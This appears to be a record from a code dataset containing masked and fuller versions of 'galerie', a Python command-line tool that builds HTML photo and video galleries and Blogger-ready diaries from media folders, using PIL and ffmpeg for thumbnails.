config.getboolean('source', 'bydate')\n options.source.diary = config.getboolean('source', 'diary')\n options.source.recursive = config.getboolean('source', 'recursive')\n options.source.dates = config.get('source', 'dates')\n options.source.github_pages = config.getboolean('source',\n 
'github_pages', default=False)\n options.thumbnails.media_description = config.getboolean('thumbnails',\n 'media_description')\n options.thumbnails.subdir_caption = config.getboolean('thumbnails',\n 'subdir_caption')\n options.thumbnails.thumbdelay = config.getint('thumbnails', 'thumbdelay')\n options.thumbnails.threshold_thumbs = config.getint('thumbnails',\n 'threshold_thumbs')\n options.thumbnails.threshold_htmlfiles = config.getint('thumbnails',\n 'threshold_htmlfiles', default=3)\n options.photobox.loop = config.getboolean('photobox', 'loop')\n options.photobox.thumbs = config.getboolean('photobox', 'thumbs')\n options.photobox.autoplay = config.getboolean('photobox', 'autoplay')\n options.photobox.time = config.getint('photobox', 'time')\n options.photobox.zoomable = config.getboolean('photobox', 'zoomable')\n options.photobox.rotatable = config.getboolean('photobox', 'rotatable')\n options.photobox.wheelNextPrev = config.getboolean('photobox',\n 'wheelNextPrev')\n\n\ndef setconfig(cfgname, section, key, value):\n config = MyConfigParser()\n config.read(cfgname)\n config.set(section, key, value)\n with open(cfgname, 'wt') as configfile:\n config.write(configfile)\n\n\ndef setconfig_cmd(args):\n config_filename = configfilename(args)\n setconfig(config_filename, *args.setcfg)\n\n\ndef update_config(args):\n updates = ('sourcedir', args.sourcedir), ('bydir', BOOL[args.bydir]), (\n 'bydate', BOOL[args.bydate]), ('diary', BOOL[args.diary]), ('recursive'\n , BOOL[args.recursive]), ('dates', args.dates), ('github_pages',\n BOOL[args.github_pages])\n cfgname = configfilename(args)\n with open(cfgname) as f:\n cfglines = [_.strip() for _ in f.readlines()]\n for key, value in updates:\n for iline, line in enumerate(cfglines):\n if line.startswith(key):\n cfglines[iline] = f'{key} = {value}'\n break\n with open(cfgname, 'wt') as f:\n for line in cfglines:\n print(line, file=f)\n\n\ndef warning(*msg):\n print(colorama.Fore.YELLOW + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n\n\n<mask token>\n\n\ndef errorcode(msg):\n return ERRORS.splitlines().index(msg) + 1\n\n\ndef error(*msg):\n print(colorama.Fore.RED + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n sys.exit(errorcode(msg[0]))\n\n\n<mask token>\n\n\ndef parse_command_line(argstring):\n parser = argparse.ArgumentParser(description=None, usage=USAGE)\n agroup = parser.add_argument_group('Commands')\n xgroup = agroup.add_mutually_exclusive_group()\n xgroup.add_argument('--gallery', help='source in --sourcedir', action=\n 'store', metavar='<root-dir>')\n agroup.add_argument('--update', help=\n 'updates gallery with parameters in config file', action='store',\n metavar='<root-dir>')\n xgroup.add_argument('--create', help=\n 'create journal from medias in --sourcedir', action='store',\n metavar='<root-dir>')\n xgroup.add_argument('--resetcfg', help='reset config file to defaults',\n action='store', metavar='<root-dir>')\n xgroup.add_argument('--setcfg', help=argparse.SUPPRESS, action='store',\n nargs=4, metavar='<root-dir>')\n xgroup.add_argument('--idem', help=argparse.SUPPRESS, action='store',\n metavar='<root-dir>')\n xgroup.add_argument('--blogger', help=\n 'input md, html blogger ready in clipboard', action='store',\n metavar='<root-dir>')\n agroup = parser.add_argument_group('Parameters')\n agroup.add_argument('--bydir', help='organize gallery by subdirectory',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--bydate', help='organize gallery by date', action\n ='store', 
default=None, choices=BOOL)\n agroup.add_argument('--diary', help=\n 'organize gallery using markdown file diary', action='store',\n default=None, choices=BOOL)\n agroup.add_argument('--recursive', help='--sourcedir scans recursively',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--dates', help='dates interval', action='store',\n default=None)\n agroup.add_argument('--sourcedir', help='media directory', action=\n 'store', default=None)\n agroup.add_argument('--github_pages', help='github Pages compatibility',\n action='store', default=None, choices=BOOL)\n agroup.add_argument('--dest', help='output directory', action='store')\n agroup.add_argument('--forcethumb', help=\n 'force calculation of thumbnails', action='store_true', default=False)\n agroup.add_argument('--full', help=\n 'full html (versus blogger ready html)', action='store_true',\n default=False)\n agroup.add_argument('--check', dest='check_images', help=\n 'check availability of medias on blogger', action='store_true')\n agroup.add_argument('--url', dest='urlblogger', help='blogger post url',\n action='store')\n if argstring is None:\n print('Type \"galerie -h\" for help')\n sys.exit(1)\n else:\n args = parser.parse_args(argstring.split())\n if args.update and (args.bydir or args.bydate or args.diary or args.\n sourcedir or args.recursive or args.dates or args.github_pages):\n error('Incorrect parameters:',\n '--update cannot be used with creation parameters, use explicit command'\n )\n args.bydir = args.bydir == 'true'\n args.bydate = args.bydate == 'true'\n args.diary = args.diary == 'true'\n args.recursive = args.recursive == 'true'\n args.dates = 'source' if args.dates is None else args.dates\n args.github_pages = args.github_pages == 'true'\n args.root = (args.create or args.gallery or args.update or args.blogger or\n args.idem or args.resetcfg)\n if args.setcfg:\n args.root = args.setcfg[0]\n args.setcfg = args.setcfg[1:]\n return args\n\n\ndef setup_part1(args):\n \"\"\"\n Made before reading config file (config file located in args.root).\n Check and normalize root path.\n \"\"\"\n args.rootarg = args.root\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext == '':\n pass\n else:\n args.root = os.path.dirname(args.root)\n if args.root:\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n if args.gallery:\n os.mkdir(args.root)\n else:\n error('Directory not found', args.root)\n\n\ndef setup_part2(args):\n \"\"\"\n Made after reading config file.\n Check for ffmpeg in path.\n Create .thumbnails dir if necessary and create .nomedia in it.\n Copy photobox file to destination dir.\n Handle priority between command line and config file.\n \"\"\"\n if args.update:\n args.sourcedir = args.source.sourcedir\n args.bydir = args.source.bydir\n args.bydate = args.source.bydate\n args.diary = args.source.diary\n args.recursive = args.source.recursive\n args.dates = args.source.dates\n args.github_pages = args.source.github_pages\n elif args.gallery:\n args.source.sourcedir = args.sourcedir\n args.source.bydir = args.bydir\n args.source.bydate = args.bydate\n args.source.diary = args.diary\n args.source.recursive = args.recursive\n args.source.dates = args.dates\n args.source.github_pages = args.github_pages\n update_config(args)\n if args.github_pages:\n args.html_suffix = '.html'\n else:\n args.html_suffix = '.htm'\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext:\n args.rootname = os.path.basename(args.rootarg)\n else:\n args.rootname = 'index' + args.html_suffix\n if 
args.sourcedir:\n args.sourcedir = os.path.abspath(args.sourcedir)\n if os.path.splitdrive(args.sourcedir)[0]:\n drive, rest = os.path.splitdrive(args.sourcedir)\n args.sourcedir = drive.upper() + rest\n if not os.path.isdir(args.sourcedir):\n error('Directory not found', args.sourcedir)\n elif args.gallery and args.diary is False and args.update is None:\n error('Directory not found', 'Use --sourcedir')\n if args.dest:\n args.dest = os.path.abspath(args.dest)\n if args.dest is None:\n args.dest = args.root\n if args.blogger and args.urlblogger is None:\n error('No blogger url (--url)')\n if args.gallery or args.update:\n for exe in ('ffmpeg', 'ffprobe'):\n try:\n check_output([exe, '-version'])\n except FileNotFoundError:\n error('File not found', exe)\n if args.github_pages:\n args.thumbrep = 'thumbnails'\n else:\n args.thumbrep = '.thumbnails'\n args.thumbdir = os.path.join(args.dest, args.thumbrep)\n if not os.path.exists(args.thumbdir):\n os.mkdir(args.thumbdir)\n open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()\n favicondst = os.path.join(args.dest, 'favicon.ico')\n if not os.path.isfile(favicondst):\n faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')\n shutil.copyfile(faviconsrc, favicondst)\n photoboxdir = os.path.join(args.dest, 'photobox')\n if not os.path.exists(photoboxdir):\n photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')\n shutil.copytree(photoboxsrc, photoboxdir)\n if args.dates:\n if not (args.gallery or args.create):\n pass\n if args.dates == 'source':\n pass\n elif args.dates == 'diary':\n if args.create:\n error('Incorrect date format', args.dates)\n elif re.match('\\\\d+-\\\\d+', args.dates):\n date1, date2 = args.dates.split('-')\n if validate_date(date1) and validate_date(date2):\n args.dates = date1, date2\n else:\n error('Incorrect date format', args.dates)\n else:\n error('Incorrect date format', args.dates)\n\n\ndef main(argstring=None):\n colorama.init()\n args = parse_command_line(argstring)\n setup_part1(args)\n read_config(args)\n setup_part2(args)\n try:\n if args.gallery or args.update:\n create_gallery(args)\n elif args.create:\n create_diary(args)\n elif args.blogger:\n prepare_for_blogger(args)\n elif args.idem:\n idempotence(args)\n elif args.setcfg:\n setconfig_cmd(args)\n except KeyboardInterrupt:\n warning('Interrupted by user.')\n\n\n<mask token>\n",
"step-5": "\"\"\"\nMake html galleries from media directories. Organize by dates, by subdirs or by\nthe content of a diary file. The diary file is a markdown file organized by\ndates, each day described by a text and some medias (photos and movies).\n\nThe diary file can be exported to:\n* an html file with the text and subset of medias associated with each day,\n* the previous html file extended with all medias in the media directory,\n* an html file ready to import into Blogger.\n\"\"\"\n\n\nimport sys\nimport os\nimport argparse\nimport glob\nimport shutil\nimport re\nimport io\nimport bisect\nimport locale\nimport textwrap\nimport base64\nimport datetime\nimport urllib\n\nfrom configparser import ConfigParser\nfrom collections import defaultdict\nfrom subprocess import check_output, CalledProcessError, STDOUT\nfrom urllib.request import urlopen\n\nimport colorama\nimport clipboard\nimport PIL\nfrom PIL import Image, ImageChops\nfrom lxml import objectify\nimport markdown\n\n\nUSAGE = \"\"\"\ngalerie --gallery <root-dir> [--sourcedir <media-dir>]\n [--bydir true|false*]\n [--bydate true|false*]\n [--diary true|false*]\n [--recursive true|false*]\n [--dates source*|diary|<yyyymmdd-yyyymmdd>]\n [--github_pages true|false]\n [--dest <directory>]\n [--forcethumb]\ngalerie --update <root-dir>\ngalerie --create <root-dir> --sourcedir <media-dir>\n [--recursive true|false*]\n [--dates source*|<yyyymmdd-yyyymmdd>]\ngalerie --blogger <root-dir> --url <url>\n [--check]\n [--full]\n [--dest <filename>]\n\nNotes:\n - * gives default\n - all options can be abbreviated if there is no conflict with other options (--gallery --> --gal)\n\n\"\"\"\n\n\n# -- Post objects -------------------------------------------------------------\n\n\nCAPTION_IMAGE_STYLE = '''\\\n<style type=\"text/css\">\n span { display:inline-table; }\n </style>\\\n'''\n\nSTYLE = '''\\\n<style type=\"text/css\">\n p { margin-top:0px; margin-bottom:0px; }\n h3 { font-size: 100%%; font-weight: bold; margin-top:0px; margin-bottom:0px; }\n </style>\n'''\n\nSTART = f'''\\\n<html>\n\n<head>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n <title>%s</title>\n <link rel=\"icon\" href=\"favicon.ico\" />\n <meta name=\"viewport\" content=\"width=device-width\">\n <link rel=\"stylesheet\" href=\"photobox/photobox.css\">\n <script src=\"photobox/jquery.min.js\"></script>\n <script src=\"photobox/jquery.photobox.js\"></script>\n{CAPTION_IMAGE_STYLE}\n{STYLE}\n</head>\n\n<body>\\\n'''\n\nBUTTONS = '''\\\n<button id=\"btn_full\" type=\"button\" style=\"position: fixed; width: 50px; top: 20px; right: 20px; background-color:white\">Full</button>\n<button id=\"btn_blog\" type=\"button\" style=\"position: fixed; width: 50px; top: 40px; right: 20px; background-color:white\">Diary</button>\n<button id=\"btn_text\" type=\"button\" style=\"position: fixed; width: 50px; top: 60px; right: 20px; background-color:white\">Text</button>\n\n<script>\n$('#btn_full').click(function() {\n $(\"[id^=gallery-blog]\").show();\n $(\"[id^=gallery-dcim]\").show();\n $(\"div.extra\").show();\n});\n$('#btn_text').click(function() {\n $(\"[id^=gallery-blog]\").hide();\n $(\"[id^=gallery-dcim]\").hide();\n $(\"div.extra\").hide();\n});\n$('#btn_blog').click(function() {\n $(\"[id^=gallery-blog]\").show();\n $(\"[id^=gallery-dcim]\").hide();\n $(\"div.extra\").hide();\n});\n</script>\n'''\n\nSUBDIR_BACKCOL = '#eee'\nEND = '</body>\\n</html>'\nSEP = '<hr color=\"#C0C0C0\" size=\"1\" />'\nIMGPOST = '<a href=\"%s\"><img src=\"%s\" width=\"%d\" 
height=\"%d\" title=\"%s\"/></a>'\nVIDPOST = '<a href=\"%s\" rel=\"video\"><img src=\"%s\" width=\"%d\" height=\"%d\" title=\"%s\"/></a>'\nIMGPOSTCAPTION = '''\\\n<span>\n<a href=\"%s\"><img src=%s width=\"%d\" height=\"%d\" title=\"%s\"/></a>\n<p>%s</p>\n</span>\n'''\nVIDPOSTCAPTION = '''\\\n<span>\n<a href=\"%s\" rel=\"video\"><img src=%s width=\"%d\" height=\"%d\" title=\"%s\"/></a>\n<p>%s</p>\n</span>\n'''\nIMGDCIM = '<a href=\"%s\"><img src=\"%s\" width=\"%d\" height=\"%d\" title=\"%s\"/></a>'\nVIDDCIM = '<a href=\"%s\" rel=\"video\"><img src=\"%s\" width=\"%d\" height=\"%d\" title=\"%s\"/></a>'\n\n# diminution de l'espace entre images, on utilise :\n# \"display: block;\", \"margin-bottom: 0em;\" et \"font-size: 0;\"\n# \"display: block;\" dans img : espacement correct ordi mais pas centré téléphone\n# \"display: block;\" dans a : ok\n\nDIRPOST = '<a href=\"%s\"><img src=\"%s\" width=\"%d\" height=\"%d\" style=\"border: 1px solid #C0C0C0;\" /></a>'\nDIRPOSTCAPTION = f'''\n<span style=\"background-color:{SUBDIR_BACKCOL}; margin-bottom: 8px; border: 1px solid #C0C0C0;\">\n<a href=\"%s\"><img src=\"%s\" width=\"%d\" height=\"%d\" style=\"border: 1px solid #C0C0C0;\" /></a>\n<p style=\"margin-left:2px;\">%s</p>\n</span>\n'''\nBIMGPAT = '''\\\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"%s\" style=\"clear: left; margin-bottom: 0em; margin-right: 1em; font-size: 0; display: block;\">\n<img border=\"0\" src=\"%s\" width=\"640\" />\n</a></div>\n'''\nCAPTION_PAT = '''\\\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n%s\n</div>\n'''\n\n\nclass Post:\n def __init__(self, date, text, medias):\n # date: yyyymmdd\n self.date = date\n self.text = text\n self.medias = medias\n self.dcim = []\n self.daterank = 0\n self.extra = False\n\n def __lt__(self, other):\n return self.date < other.date\n\n @classmethod\n def from_markdown(cls, post):\n m = re.match(r'\\[(\\d\\d\\d\\d/\\d\\d/\\d\\d)\\]\\n*', post[0])\n if m:\n date = m.group(1).replace('/', '')\n if not validate_date(date):\n error('Incorrect date value:', date)\n del post[0]\n else:\n error('No date in post', ' '.join(post))\n\n while post and not post[0].strip():\n del post[0]\n\n text = ''\n while post and not re.match(r'!?\\[\\]', post[0]):\n text += post[0]\n del post[0]\n\n # remove empty lines at end\n text = re.sub(r'\\n\\n$', '\\n', text)\n\n medias = list()\n while post and (match := re.match(r'!?\\[\\]\\((.*)\\)', post[0])):\n media = match.group(1)\n caption = None\n del post[0]\n if post and not re.match(r'!?\\[\\]', post[0]):\n caption = post[0].strip()\n del post[0]\n if match.group(0)[0] == '!':\n medias.append(PostImage(caption, media))\n else:\n medias.append(PostVideo(caption, media))\n\n return cls(date, text, medias)\n\n @classmethod\n def from_date(cls, date):\n dt = datetime.datetime.strptime(date, '%Y%m%d')\n datetext = dt.strftime(\"%A %d %B %Y\").capitalize()\n post = cls(date, text=datetext, medias=[])\n post.daterank = 1\n return post\n\n def to_html(self, args, target='regular'):\n if target == 'regular':\n if args.diary:\n return self.to_html_diary(args)\n else:\n return self.to_html_regular(args)\n if target == 'blogger':\n return self.to_html_blogger()\n\n def to_html_regular(self, args):\n html = list()\n if self.text:\n # possible with --bydate\n html.append(markdown.markdown(self.text))\n subdirs, dcim = dispatch_post_items(self.dcim)\n if self.dcim:\n html.append(SEP)\n for media in subdirs:\n html.append(media.to_html_dcim(args))\n if dcim:\n 
html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n\n html.append(SEP)\n return html\n\n def to_html_diary(self, args):\n html = list()\n if self.extra:\n html.append('<div class=\"extra\">')\n\n if self.text:\n html.append(markdown.markdown(self.text))\n\n if self.medias:\n html.append(f'<div id=\"gallery-blog-{self.date}-{self.daterank}\">')\n for media in self.medias:\n html.append(media.to_html_post(args))\n html.append('</div>')\n\n _, dcim = dispatch_post_items(self.dcim)\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n html.append(SEP)\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n\n html.append(SEP)\n if self.extra:\n html.append('</div>')\n return html\n\n def to_html_blogger(self):\n html = list()\n html.append(markdown.markdown(self.text))\n for image in self.medias:\n html.append(image.to_html_blogger())\n html.append(SEP)\n return html\n\n\nclass PostItem:\n def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):\n self.caption = caption\n self.uri = uri\n self.basename = os.path.basename(uri)\n self.thumb = thumb\n self.thumbsize = thumbsize\n self.descr = descr\n self.resized_url = None\n\n\nclass PostImage(PostItem):\n def to_markdown(self):\n if not self.caption:\n return '' % (self.uri,)\n else:\n return '\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return IMGPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize, descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *self.thumbsize, descr)\n\n def to_html_blogger(self):\n if not self.caption:\n return BIMGPAT % (self.uri, self.resized_url)\n else:\n return f'{BIMGPAT}\\n{CAPTION_PAT}' % (self.uri, self.resized_url, self.caption)\n\n\nclass PostVideo(PostItem):\n def to_markdown(self):\n if not self.caption:\n return '[](%s)' % (self.uri,)\n else:\n return '[](%s)\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return VIDPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize, descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *self.thumbsize, descr)\n\n def to_html_blogger(self):\n x = f'<p style=\"text-align: center;\">{self.iframe}</p>'\n if not self.caption:\n return x\n else:\n return f'%s\\n{CAPTION_PAT}' % (x, self.caption)\n\n\nclass PostSubdir(PostItem):\n def to_html_dcim(self, args):\n basename = os.path.basename(self.htmname)\n posts = self.posts\n title = self.caption\n print_html(args, posts, title, self.htmname)\n\n if not self.caption:\n return DIRPOST % (basename, self.thumb, *self.thumbsize)\n else:\n return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize, self.caption)\n\n\ndef relative_url(path, root):\n \"\"\"\n returns a normalized url to path relative from root\n \"\"\"\n try:\n url = os.path.relpath(path, root)\n except:\n error('Unable to make a relative url:', url, 
root)\n\n url = url.replace('\\\\', '/') if os.sep == '\\\\' else url\n\n return urllib.parse.quote(url)\n\n\n# -- Markdown parser ----------------------------------------------------------\n\n\ndef parse_markdown(filename):\n \"\"\"\n Generate Post objects from markdown. Date must be present in each post and\n posts must be ordrered by date.\n \"\"\"\n if not os.path.exists(filename):\n error('File not found', filename)\n\n posts = list()\n with open(filename, encoding='utf-8') as f:\n line = next(f)\n if line.startswith('# '):\n title = line[2:].strip()\n record = []\n next(f)\n else:\n title = None\n record = [line]\n for line in f:\n if not line.startswith('___'):\n record.append(line)\n else:\n posts.append(Post.from_markdown(record))\n record = []\n\n # set rank of posts in date\n daterank = defaultdict(int)\n for post in posts:\n daterank[post.date] += 1\n post.daterank = daterank[post.date]\n\n # check post order\n for post1, post2 in zip(posts[:-1], posts[1:]):\n if post1.date > post2.date:\n error('Posts are not ordered', f'{post1.date} > {post2.date}')\n\n return title, posts\n\n\n# -- Markdown printer ---------------------------------------------------------\n\n\ndef print_markdown(posts, title, fullname):\n with open(fullname, 'wt', encoding='utf-8') as fdst:\n print(f'# {title}\\n', file=fdst)\n for post in posts:\n date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'\n print(date, file=fdst)\n if post.text:\n print(file=fdst)\n for line in post.text.splitlines():\n if not line:\n print(file=fdst)\n else:\n for chunk in textwrap.wrap(line, width=78):\n print(chunk, file=fdst)\n if post.medias:\n print(file=fdst)\n for media in post.medias:\n print(media.to_markdown(), file=fdst)\n print('______', file=fdst)\n\n\n# -- html printer -------------------------------------------------------------\n\n\ndef compose_html_reduced(args, posts, title, target):\n html = list()\n html.append(START % title)\n\n for post in posts:\n for line in post.to_html(args, target):\n html.append(line.strip())\n html.append('')\n\n html.append(END)\n return html\n\n\ndef compose_html_full(args, posts, title, target):\n html = list()\n html.append(START % title)\n\n if args.diary:\n html.append(BUTTONS)\n\n for post in posts:\n for line in post.to_html(args, target):\n html.append(line.strip())\n html.append('')\n\n html.append('<script>')\n for post in posts:\n if post.medias:\n gallery_id = f'gallery-blog-{post.date}-{post.daterank}'\n html.append(gallery_call(args, gallery_id))\n if post.dcim:\n gallery_id = f'gallery-dcim-{post.date}-{post.daterank}'\n html.append(gallery_call(args, gallery_id))\n html.append('</script>')\n\n html.append(END)\n return html\n\n\ndef print_html_to_stream(args, posts, title, stream, target):\n if target == 'regular':\n for line in compose_html_full(args, posts, title, target):\n print(line, file=stream)\n else:\n for line in compose_html_reduced(args, posts, title, target):\n print(line, file=stream)\n\n\ndef print_html(args, posts, title, html_name, target='regular'):\n assert target in ('regular', 'blogger')\n with io.StringIO() as f:\n print_html_to_stream(args, posts, title, f, target)\n html = f.getvalue()\n\n if html_name:\n if os.path.exists(html_name):\n # test if the generated html is identical to the one already on disk\n with open(html_name, 'rt', encoding='utf-8') as f:\n html0 = f.read()\n if html == html0:\n return None\n with open(html_name, 'wt', encoding='utf-8') as f:\n f.write(html)\n return None\n else:\n return html\n\n\nGALLERYCALL = 
\"\"\"\n$('#%s').photobox('a', {\nloop:%s,\nthumbs:%s,\nautoplay:%s,\ntime:%d,\nzoomable:%s ,\nrotatable:%s,\nwheelNextPrev:%s\n});\n\"\"\"\n\n\ndef gallery_call(args, gallery_id):\n return GALLERYCALL.replace('\\n', '') % (\n gallery_id,\n str(args.photobox.loop).lower(),\n str(args.photobox.thumbs).lower(),\n str(args.photobox.autoplay).lower(),\n args.photobox.time,\n str(args.photobox.zoomable).lower(),\n str(args.photobox.rotatable).lower(),\n str(args.photobox.wheelNextPrev).lower(),\n )\n\n\n# -- Media description --------------------------------------------------------\n\n\ndef is_image_file(name):\n return os.path.splitext(name)[1].lower() in (\n '.jpg', '.jpeg', '.png', '.gif', '.bmp', '.webp', '.tif'\n )\n\n\ndef is_video_file(name):\n return os.path.splitext(name)[1].lower() in (\n '.mp4', '.webm', '.mkv', '.flv', '.m4v', '.avi', '.wmv', '.mts', '.vob', '.divx'\n )\n\n\ndef is_media(name):\n return is_image_file(name) or is_video_file(name)\n\n\ndef validate_date(datestr):\n # datestr = yyyymmdd\n try:\n datetime.datetime.strptime(datestr, '%Y%m%d')\n return True\n except ValueError:\n return False\n\n\ndef date_from_name(name):\n # heuristics\n if match := re.search(r'(?:\\D|^)(\\d{8})(?:\\D|$)', name, re.ASCII):\n digits = match.group(1)\n if validate_date(digits):\n return digits\n return None\n\n\ndef date_from_item(filename):\n if date := date_from_name(filename):\n return date\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')\n\n\ndef time_from_name(name):\n # heuristics\n if match := re.search(r'(?:\\D|^)(\\d{8})\\D(\\d{6})(?:\\D|$)', name, re.ASCII):\n digits = match.group(2)\n hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits[4:6])\n if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:\n return digits\n return None\n\n\ndef time_from_item(filename):\n if time := time_from_name(filename):\n return time\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')\n\n\nFFPROBE_CMD = '''\\\n ffprobe -v error\n -select_streams v:0\n -show_entries stream=width,height,avg_frame_rate,r_frame_rate:format=duration\n -of csv=p=0\n'''\n\n\ndef get_image_info(filename):\n date = date_from_item(filename)\n time = time_from_item(filename)\n img = Image.open(filename)\n width, height = img.size\n size = round(os.path.getsize(filename) / 1e6, 1)\n return (date, time, width, height, size), f'{date} {time}, dim={width}x{height}, {size} MB'\n\n\ndef get_video_info(filename, info_fullname):\n if os.path.exists(info_fullname):\n with open(info_fullname) as f:\n info = f.readline().split()\n date, time, width, height, size, duration, fps = info[0], info[1], int(info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6])\n formatted_info = format_video_info(date, time, width, height, size, duration, fps)\n return (date, time, width, height, size, duration, fps), formatted_info\n else:\n info, formatted_info = make_video_info(filename, info_fullname)\n with open(info_fullname, 'wt') as f:\n print(' '.join([str(_) for _ in info]), file=f)\n return info, formatted_info\n\n\ndef make_video_info(filename, info_fullname):\n # ffmpeg must be in path\n date = date_from_item(filename)\n time = time_from_item(filename)\n command = [*FFPROBE_CMD.split(), filename]\n try:\n output = check_output(command, stderr=STDOUT).decode()\n width, height, fps, duration = parse_ffprobe_output(output)\n size = round(os.path.getsize(filename) / 1e6, 1)\n 
output = format_video_info(date, time, width, height, size, duration, fps)\n except CalledProcessError as e:\n output = e.output.decode()\n warning(output)\n raise\n return (date, time, width, height, size, duration, fps), output\n\n\ndef parse_ffprobe_output(ffprobe_output):\n # parse first channel data and last line for duration\n match = re.match(r'(\\d+),(\\d+),(\\d+)/(\\d+),(\\d+/\\d+).*\\s(\\d+\\.\\d+)', ffprobe_output, re.DOTALL)\n width = int(match.group(1))\n height = int(match.group(2))\n fps = round(int(match.group(3)) / int(match.group(4)), 1)\n duration = round(float(match.group(6)))\n return width, height, fps, duration\n\n\ndef format_video_info(date, time, width, height, size, duration, fps):\n return f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'\n\n\ndef format_duration(duration):\n mn = duration // 60\n sec = duration % 60\n if mn <= 59:\n return f'm:s={mn:02}:{sec:02}'\n else:\n hour = mn // 60\n mn = mn % 60\n return f'h:m:s={hour:02}:{mn:02}:{sec:02}'\n\n\n# -- Thumbnails (image and video) ---------------------------------------------\n\n\ndef thumbname(name, key):\n return key + '-' + name + '.jpg'\n\n\ndef size_thumbnail(width, height, maxdim):\n if width >= height:\n return maxdim, int(round(maxdim * height / width))\n else:\n return int(round(maxdim * width / height)), maxdim\n\n\ndef make_thumbnail_image(args, image_name, thumb_name, size):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_image(image_name, thumb_name, size)\n\n\ndef create_thumbnail_image(image_name, thumb_name, size):\n imgobj = Image.open(image_name)\n\n if (imgobj.mode != 'RGBA'\n and image_name.endswith('.jpg')\n and not (image_name.endswith('.gif') and imgobj.info.get('transparency'))\n ):\n imgobj = imgobj.convert('RGBA')\n\n imgobj.thumbnail(size, Image.LANCZOS)\n imgobj = imgobj.convert('RGB')\n imgobj.save(thumb_name)\n\n\ndef make_thumbnail_video(args, video_name, thumb_name, size, duration):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_video(args, video_name, thumb_name, size, duration)\n\n\n# base64 video.png\nVIDEO_ICON = '''\\\niVBORw0KGgoAAAANSUhEUgAAABgAAAAUCAAAAACy3qJfAAAA4UlEQVR4\n2m1QoRbCMAy88SaK69xscfuEWiS4SZBIcCCRfAL8An8AcnJzTOJSWdxwzJXSPUoHRPQlueYuucigxm\n9kDGaMf8AjopGcYn8LmmyLoihBWBiThb+5MTuUsc3aL56upneZ9sByAIg8Z8BEn96EeZ65iU7DvmbP\nPxqDcH6p1swXBC4l6yZskACkTN1WrQr2SlIFhTtgqeZa+zsOogLXegvEocZ5c/W5BcoVNNCg3hSudV\n/hEh4ofw6cEb00Km8i0dpRDUXfKiaQOEAdrUDo4dFp9C33jjaRac9/gDF/AlplVYtfWGCjAAAAAElF\nTkSuQmCC'''\n\n\ndef create_thumbnail_video(args, filename, thumbname, size, duration):\n # ffmpeg must be in path\n delay = min(duration - 1, args.thumbnails.thumbdelay)\n sizearg = '%dx%d' % size\n command = 'ffmpeg -y -v error -itsoffset -%d -i \"%s\" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s \"%s\"'\n command = command % (delay, filename, sizearg, thumbname)\n result = os.system(command)\n\n # add a movie icon to the thumbnail to identify videos\n try:\n img1 = Image.open(thumbname)\n except:\n # ffmpeg was unable to save thumbnail\n warning('Unable to save thumbnail for', filename)\n return\n img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))\n width, height = img1.size\n img1.paste(img2, (6, height - 20 - 6), None)\n img1.save(thumbname)\n\n\ndef make_thumbnail_subdir(args, subdir_name, thumb_name, size, items, thumbdir):\n # subdir thumbnails are 
